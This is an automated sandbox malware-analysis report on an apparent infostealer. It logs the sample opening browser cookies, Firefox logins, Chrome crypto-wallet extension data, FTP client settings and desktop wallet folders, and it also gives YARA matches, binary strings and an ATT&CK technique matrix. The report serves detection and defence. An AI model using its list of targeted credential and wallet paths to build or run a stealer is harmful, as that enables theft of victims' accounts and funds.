                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                          Source: 2ada66c192.exeBinary or memory string: WIN_81
                          Source: 2ada66c192.exeBinary or memory string: WIN_XP
                          Source: 2ada66c192.exe, 0000002C.00000000.2906143455.0000000000732000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                          Source: 2ada66c192.exeBinary or memory string: WIN_XPe
                          Source: 2ada66c192.exeBinary or memory string: WIN_VISTA
                          Source: 2ada66c192.exeBinary or memory string: WIN_7
                          Source: 2ada66c192.exeBinary or memory string: WIN_8
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
                          Source: Yara matchFile source: 00000007.00000003.2496625597.0000000000C54000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000A.00000003.2656254636.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000A.00000003.2656059323.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000A.00000003.2722206799.0000000000CC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000007.00000003.2576907728.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000007.00000003.2572489789.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000007.00000003.2520611019.0000000000C55000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000A.00000003.2657437696.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000007.00000003.2543919841.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000007.00000003.2545054746.0000000000C61000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000007.00000003.2543892695.0000000000C54000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000A.00000003.2717480504.0000000000CC1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000A.00000003.2657790629.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000007.00000003.2497346871.0000000000C54000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000A.00000003.2684316064.0000000000CC1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000A.00000003.2630336262.0000000000CC1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000007.00000003.2545193277.0000000000C61000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000A.00000003.2630205909.0000000000CC1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000007.00000003.2572381559.0000000000C55000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: ae5cfd188c.exe PID: 7872, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: ae5cfd188c.exe PID: 3512, type: MEMORYSTR

                          Remote Access Functionality

                          barindex
                          Source: Yara matchFile source: Process Memory Space: 2ada66c192.exe PID: 1364, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: ae5cfd188c.exe PID: 7872, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: ae5cfd188c.exe PID: 3512, type: MEMORYSTR
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: 00000009.00000002.2578174288.000000000143E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001B.00000002.2760593914.0000000000681000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001B.00000002.2764793088.000000000142B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000009.00000003.2534662557.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001B.00000003.2673057530.0000000005030000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000009.00000002.2575911980.0000000000681000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 37df924488.exe PID: 7148, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: 37df924488.exe PID: 6796, type: MEMORYSTR
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00ACEC48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,6_2_00ACEC48
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00ACDF51 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::GetInternalContext,6_2_00ACDF51
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006F1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,11_2_006F1204
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006F1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,11_2_006F1806
                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity InformationAcquire Infrastructure2
                          Valid Accounts
                          21
                          Windows Management Instrumentation
                          1
                          DLL Side-Loading
                          1
                          Exploitation for Privilege Escalation
                          421
                          Disable or Modify Tools
                          2
                          OS Credential Dumping
                          2
                          System Time Discovery
                          Remote Services1
                          Archive Collected Data
                          12
                          Ingress Tool Transfer
                          Exfiltration Over Other Network Medium1
                          System Shutdown/Reboot
                          CredentialsDomainsDefault Accounts11
                          Native API
                          2
                          Valid Accounts
                          1
                          DLL Side-Loading
                          1
                          Deobfuscate/Decode Files or Information
                          21
                          Input Capture
                          1
                          Account Discovery
                          Remote Desktop Protocol41
                          Data from Local System
                          11
                          Encrypted Channel
                          Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain Accounts2
                          Command and Scripting Interpreter
                          1
                          Scheduled Task/Job
                          2
                          Bypass User Account Control
                          3
                          Obfuscated Files or Information
                          Security Account Manager12
                          File and Directory Discovery
                          SMB/Windows Admin Shares21
                          Input Capture
                          3
                          Non-Application Layer Protocol
                          Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal Accounts1
                          Scheduled Task/Job
                          11
                          Registry Run Keys / Startup Folder
                          1
                          Extra Window Memory Injection
                          12
                          Software Packing
                          NTDS239
                          System Information Discovery
                          Distributed Component Object Model3
                          Clipboard Data
                          114
                          Application Layer Protocol
                          Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script2
                          Valid Accounts
                          1
                          DLL Side-Loading
                          LSA Secrets1
                          Query Registry
                          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts21
                          Access Token Manipulation
                          2
                          Bypass User Account Control
                          Cached Domain Credentials981
                          Security Software Discovery
                          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items12
                          Process Injection
                          1
                          Extra Window Memory Injection
                          DCSync461
                          Virtualization/Sandbox Evasion
                          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job1
                          Scheduled Task/Job
                          11
                          Masquerading
                          Proc Filesystem3
                          Process Discovery
                          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAt11
                          Registry Run Keys / Startup Folder
                          2
                          Valid Accounts
                          /etc/passwd and /etc/shadow11
                          Application Window Discovery
                          Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron461
                          Virtualization/Sandbox Evasion
                          Network Sniffing1
                          System Owner/User Discovery
                          Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd21
                          Access Token Manipulation
                          Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                          Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task12
                          Process Injection
                          KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
